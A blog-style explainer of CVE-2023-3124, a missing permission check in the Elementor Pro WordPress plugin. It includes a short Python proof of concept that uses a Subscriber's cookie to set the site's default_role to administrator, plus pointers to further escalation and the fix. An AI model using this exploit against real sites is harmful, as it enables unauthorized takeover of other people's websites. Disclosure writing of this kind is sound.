In May 2023, security researchers discovered a serious vulnerability—CVE-2023-3124— in the extremely popular Elementor Pro plugin for WordPress. This weakness allows even the lowest level user — a mere Subscriber — to make dangerous changes to your website, potentially turning themselves into administrators, unlocking total control.
Let's break down what happened, see how the exploit works, and find out what you can do to stay safe.
The Short Version
CVE-2023-3124 is an authentication flaw in all Elementor Pro versions up to 3.11.6 that lets any authenticated user (even Subscribers) update any site option—something normally reserved for admins. By changing certain site options, an attacker can grant themselves admin privileges, destroy your content, or take complete control of your site.
Total site takeover: Attackers can promote themselves to administrator.
- Common plugin: Elementor Pro is one of the top page builder plugins with millions of active installs.
The Root of the Problem
Elementor Pro failed to run a capability check in their update_page_option function. That means it didn’t make sure the person trying to update important options was really allowed to do so.
WordPress permissions are based on user roles and capabilities. Updating options should only be allowed for admins. But due to this bug, even Subscribers (the lowest role) could trigger the function.
Abusing update_page_option
Elementor Pro exposes AJAX actions—triggers that happen through HTTP requests, often from JavaScript in the browser. The vulnerable function wasn’t protected.
By sending a crafty HTTP POST request to /wp-admin/admin-ajax.php, an attacker could directly update critical site options. Most dangerously, they could change the default_role option or promote their own account!
Here’s a simple proof-of-concept in Python using the requests library:
import requests
url = 'https://example.com/wp-admin/admin-ajax.php'; # Change to your target
cookies = {'wordpress_logged_in_HASH': 'attacker_logged_in_cookie'} # Your auth cookie here
payload = {
'action': 'elementor_update_page_option', # Triggers the vulnerable action
'option_name': 'default_role', # Critical option!
'option_value': 'administrator', # BAD: New users are admins!
}
r = requests.post(url, data=payload, cookies=cookies)
print(r.text)
What does this do?
It changes the default user role in WordPress from subscriber to administrator. Any new user registering on your site (including the attacker themselves, if they register again) will automatically become an admin!
Attackers could also tweak other options or even change existing users’ roles by targeting the wp_user_roles option or modifying user metadata (with more advanced requests).
Original References & More Info
- Wordfence Detailed Advisory
- NVD CVE Record
- wpVulnDB Record
How to Fix and Protect Your Site
1. Update Elementor Pro immediately to version 3.11.7 or higher. The Elementor team fixed the flaw by adding strict capability checks.
Final Thoughts
CVE-2023-3124 is a perfect example of why software needs strong permission checks—even the most popular plugins can have critical flaws. If your site relies on Elementor Pro and you haven’t updated, do it right away. Always keep plugins updated, and check your user accounts for unusual administrators or suspicious activity.
Stay safe, keep your site updated, and check out the links above for more information!
Want to learn more about WordPress security? Follow reputable sources like Wordfence and WPScan for timely vulnerability disclosures!
Timeline
Published on: 06/07/2023 02:15:00 UTC
Last modified on: 06/13/2023 18:46:00 UTC